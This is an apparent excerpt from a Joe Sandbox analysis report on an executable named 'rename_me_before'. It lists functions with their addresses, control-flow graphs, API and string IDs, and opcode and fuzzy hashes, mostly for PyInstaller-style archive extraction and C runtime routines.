                                                                                                                                                                                                                                                            • Instruction ID: 96457cfd391f5a6e961bd355bdc95e6a6cce5f6f06dd05e2cbaebf67e8b3e16c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BC1DF32B2CA5296EB14FF68C5906AD3765FB8AB98B010235DF2E97794CF38E551C300
                                                                                                                                                                                                                                                            Function 00007FF6404E85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                                            • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                                            • Instruction ID: 5fe66202e177d99c7f807aff829b301774400ae6d1a0f4e7f2fd14126836dceb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45F0A432A1C652D6FB70FB60B59836A7350EB44328F040239D96D427D4CF7CD058CB00
                                                                                                                                                                                                                                                            Function 00007FF6404E18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 179 7ff6404e18f0-7ff6404e192b call 7ff6404e3f70 182 7ff6404e1bc1-7ff6404e1be5 call 7ff6404eb870 179->182 183 7ff6404e1931-7ff6404e1971 call 7ff6404e76a0 179->183 188 7ff6404e1bae-7ff6404e1bb1 call 7ff6404ef36c 183->188 189 7ff6404e1977-7ff6404e1987 call 7ff6404ef9f4 183->189 192 7ff6404e1bb6-7ff6404e1bbe 188->192 194 7ff6404e19a1-7ff6404e19bd call 7ff6404ef6bc 189->194 195 7ff6404e1989-7ff6404e199c call 7ff6404e2760 189->195 192->182 200 7ff6404e19bf-7ff6404e19d2 call 7ff6404e2760 194->200 201 7ff6404e19d7-7ff6404e19ec call 7ff6404f4154 194->201 195->188 200->188 206 7ff6404e19ee-7ff6404e1a01 call 7ff6404e2760 201->206 207 7ff6404e1a06-7ff6404e1a87 call 7ff6404e1bf0 * 2 call 7ff6404ef9f4 201->207 206->188 215 7ff6404e1a8c-7ff6404e1a9f call 7ff6404f4170 207->215 218 7ff6404e1aa1-7ff6404e1ab4 call 7ff6404e2760 215->218 219 7ff6404e1ab9-7ff6404e1ad2 call 7ff6404ef6bc 215->219 218->188 224 7ff6404e1ad4-7ff6404e1ae7 call 7ff6404e2760 219->224 225 7ff6404e1aec-7ff6404e1b08 call 7ff6404ef430 219->225 224->188 230 7ff6404e1b1b-7ff6404e1b29 225->230 231 7ff6404e1b0a-7ff6404e1b16 call 7ff6404e25f0 225->231 230->188 233 7ff6404e1b2f-7ff6404e1b3e 230->233 231->188 235 7ff6404e1b40-7ff6404e1b46 233->235 236 7ff6404e1b60-7ff6404e1b6f 235->236 237 7ff6404e1b48-7ff6404e1b55 235->237 236->236 238 7ff6404e1b71-7ff6404e1b7a 236->238 237->238 239 7ff6404e1b8f 238->239 240 7ff6404e1b7c-7ff6404e1b7f 238->240 241 7ff6404e1b91-7ff6404e1bac 239->241 240->239 242 7ff6404e1b81-7ff6404e1b84 240->242 241->188 241->235 242->239 243 7ff6404e1b86-7ff6404e1b89 242->243 243->239 244 7ff6404e1b8b-7ff6404e1b8d 243->244 244->241
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 677216364-3497178890
                                                                                                                                                                                                                                                            • Opcode ID: 47a0cc69fe61a424f4972c633dfe31ec108281a37c3b7613119bd6498f8acb77
                                                                                                                                                                                                                                                            • Instruction ID: 6bbb6f01bdc374e6d4f218129cfe3cf7c1562051f67e955ab5da4f0e7476a31b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47a0cc69fe61a424f4972c633dfe31ec108281a37c3b7613119bd6498f8acb77
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2671C231B1C6A6E9EB24FB24D5902BD2390FF89784F444035D98DC77AAEE6CE5448B80
                                                                                                                                                                                                                                                            Function 00007FF6404E1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                            • Opcode ID: 32997523cec49d72c5576cc17cb243c2ce74323f184c21c719246cd1ab96f7c6
                                                                                                                                                                                                                                                            • Instruction ID: 455708967c697a7a751e8e5b98a73296f6f9c874213de976e6b7dfda8cda0fd9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32997523cec49d72c5576cc17cb243c2ce74323f184c21c719246cd1ab96f7c6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8341BF32B4C663E2FA24FB15A9405BA63A0FF84BD4F444432DE5E87BA5EE3CE5418740
                                                                                                                                                                                                                                                            Function 00007FF6404E11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                                                            • Opcode ID: 86bef0d86d3d5020898d8012f61f6e4267f785464e2bead425cceb05c7e2cebb
                                                                                                                                                                                                                                                            • Instruction ID: 235a19356c93ce3a42da2f38b45c00a33ccb645bdc8f96a1bfa84f363406d5ea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86bef0d86d3d5020898d8012f61f6e4267f785464e2bead425cceb05c7e2cebb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A51E172A0C662E1FA20FB15A9403BA6291FB85794F440135EE5DC7BE6EF3CE541C780
                                                                                                                                                                                                                                                            Function 00007FF6404FAD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 729 7ff6404fad6c-7ff6404fad92 730 7ff6404fad94-7ff6404fada8 call 7ff6404f43d4 call 7ff6404f43f4 729->730 731 7ff6404fadad-7ff6404fadb1 729->731 745 7ff6404fb19e 730->745 733 7ff6404fb187-7ff6404fb193 call 7ff6404f43d4 call 7ff6404f43f4 731->733 734 7ff6404fadb7-7ff6404fadbe 731->734 752 7ff6404fb199 call 7ff6404f9bf0 733->752 734->733 736 7ff6404fadc4-7ff6404fadf2 734->736 736->733 739 7ff6404fadf8-7ff6404fadff 736->739 742 7ff6404fae01-7ff6404fae13 call 7ff6404f43d4 call 7ff6404f43f4 739->742 743 7ff6404fae18-7ff6404fae1b 739->743 742->752 748 7ff6404fb183-7ff6404fb185 743->748 749 7ff6404fae21-7ff6404fae27 743->749 750 7ff6404fb1a1-7ff6404fb1b8 745->750 748->750 749->748 753 7ff6404fae2d-7ff6404fae30 749->753 752->745 753->742 754 7ff6404fae32-7ff6404fae57 753->754 757 7ff6404fae8a-7ff6404fae91 754->757 758 7ff6404fae59-7ff6404fae5b 754->758 762 7ff6404fae93-7ff6404faebb call 7ff6404fc90c call 7ff6404f9c58 * 2 757->762 763 7ff6404fae66-7ff6404fae7d call 7ff6404f43d4 call 7ff6404f43f4 call 7ff6404f9bf0 757->763 760 7ff6404fae82-7ff6404fae88 758->760 761 7ff6404fae5d-7ff6404fae64 758->761 765 7ff6404faf08-7ff6404faf1f 760->765 761->760 761->763 790 7ff6404faebd-7ff6404faed3 call 7ff6404f43f4 call 7ff6404f43d4 762->790 791 7ff6404faed8-7ff6404faf03 call 7ff6404fb594 762->791 794 7ff6404fb010 763->794 768 7ff6404faf21-7ff6404faf29 765->768 769 7ff6404faf9a-7ff6404fafa4 call 7ff640502c2c 765->769 768->769 773 7ff6404faf2b-7ff6404faf2d 768->773 781 7ff6404fb02e 769->781 782 7ff6404fafaa-7ff6404fafbf 769->782 773->769 778 7ff6404faf2f-7ff6404faf45 773->778 778->769 783 7ff6404faf47-7ff6404faf53 778->783 786 7ff6404fb033-7ff6404fb053 ReadFile 781->786 782->781 788 7ff6404fafc1-7ff6404fafd3 GetConsoleMode 782->788 783->769 784 7ff6404faf55-7ff6404faf57 783->784 784->769 789 7ff6404faf59-7ff6404faf71 784->789 792 7ff6404fb14d-7ff6404fb156 GetLastError 786->792 793 7ff6404fb059-7ff6404fb061 786->793 788->781 795 7ff6404fafd5-7ff6404fafdd 788->795 789->769 797 7ff6404faf73-7ff6404faf7f 789->797 790->794 791->765 802 7ff6404fb173-7ff6404fb176 792->802 803 7ff6404fb158-7ff6404fb16e call 7ff6404f43f4 call 7ff6404f43d4 792->803 793->792 799 7ff6404fb067 793->799 796 7ff6404fb013-7ff6404fb01d call 7ff6404f9c58 794->796 795->786 801 7ff6404fafdf-7ff6404fb001 ReadConsoleW 795->801 796->750 797->769 805 7ff6404faf81-7ff6404faf83 797->805 809 7ff6404fb06e-7ff6404fb083 799->809 811 7ff6404fb003 GetLastError 801->811 812 7ff6404fb022-7ff6404fb02c 801->812 806 7ff6404fb17c-7ff6404fb17e 802->806 807 7ff6404fb009-7ff6404fb00b call 7ff6404f4368 802->807 803->794 805->769 816 7ff6404faf85-7ff6404faf95 805->816 806->796 807->794 809->796 818 7ff6404fb085-7ff6404fb090 809->818 811->807 812->809 816->769 822 7ff6404fb092-7ff6404fb0ab call 7ff6404fa984 818->822 823 7ff6404fb0b7-7ff6404fb0bf 818->823 829 7ff6404fb0b0-7ff6404fb0b2 822->829 826 7ff6404fb0c1-7ff6404fb0d3 823->826 827 7ff6404fb13b-7ff6404fb148 call 7ff6404fa7c4 823->827 830 7ff6404fb0d5 826->830 831 7ff6404fb12e-7ff6404fb136 826->831 827->829 829->796 832 7ff6404fb0da-7ff6404fb0e1 830->832 831->796 834 7ff6404fb0e3-7ff6404fb0e7 832->834 835 7ff6404fb11d-7ff6404fb128 832->835 836 7ff6404fb103 834->836 837 7ff6404fb0e9-7ff6404fb0f0 834->837 835->831 839 7ff6404fb109-7ff6404fb119 836->839 837->836 838 7ff6404fb0f2-7ff6404fb0f6 837->838 838->836 840 7ff6404fb0f8-7ff6404fb101 838->840 839->832 841 7ff6404fb11b 839->841 840->839 841->831
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                                                                                                            • Instruction ID: 1befe4a4177dd3b3873daa27a92c6d9d73791894762db0d4e42a47cfc4a13dbd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FC10162A0C6A7F1EB64BB1494402BE37AAFB92BC0F550131EA5D877D1CF7CE8558740
                                                                                                                                                                                                                                                            Function 00007FF6404E33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF6404E3534), ref: 00007FF6404E3411
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E29E0: GetLastError.KERNEL32(?,?,?,00007FF6404E342E,?,00007FF6404E3534), ref: 00007FF6404E2A14
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6404E342E), ref: 00007FF6404E2A7D
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E29E0: MessageBoxW.USER32 ref: 00007FF6404E2ACF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                            • API String ID: 517058245-2863816727
                                                                                                                                                                                                                                                            • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                                            • Instruction ID: 38c06243298b15ed8099fe7993e28303999cab98f5eaaac513a8b9e0303a0545
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A121A461B1C563F1FE25FB24E9553BA1260BF49395F800236DA6DC67D6EE2CE504C780
                                                                                                                                                                                                                                                            Function 00007FF6404F4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                                                            • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                                                            • Instruction ID: b812c0209f54b6a60e057f1f873657876772e2061edb54fed5764d39b177f2ce
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE41B062E1C79293F354FB6095503696266FBD47A4F109334EAAC83BD1EF6CA1E08700
                                                                                                                                                                                                                                                            Function 00007FF6404EBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                                                            • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                            • Instruction ID: 4535f9a2bdabda74afa0a46e2157a74f4d229af8e152e6f74e7c852a6d44e2ce
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B314D21E1C273E1FA54FBA495513B91382AF41389F440039EA5DCB7D3DE2DA9468781
                                                                                                                                                                                                                                                            Function 00007FF6404F8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                            • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                            • Instruction ID: 275b5b68ebe631f5b405311be8789fbbdaaaa0075aa6f363818cb514755840b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCD06C24B1C62AE6FB6C3B70599917D1226AFA9B55F10193CD85A8A393CE2CA8098340
                                                                                                                                                                                                                                                            Function 00007FF6404EF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 8760811a46c694da2ce7fcb713cb8132a6e7826c56b7b9f56bdeeaa18c726bba
                                                                                                                                                                                                                                                            • Instruction ID: ca09be03a7b31e671568cd9be017c4c4c3ddd44007bcefd41ad6f2076da691d1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8760811a46c694da2ce7fcb713cb8132a6e7826c56b7b9f56bdeeaa18c726bba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C151F961B0D662E6FA28FE35940067A6281FF94BB8F144734DD6C877D5CE3CE4019760
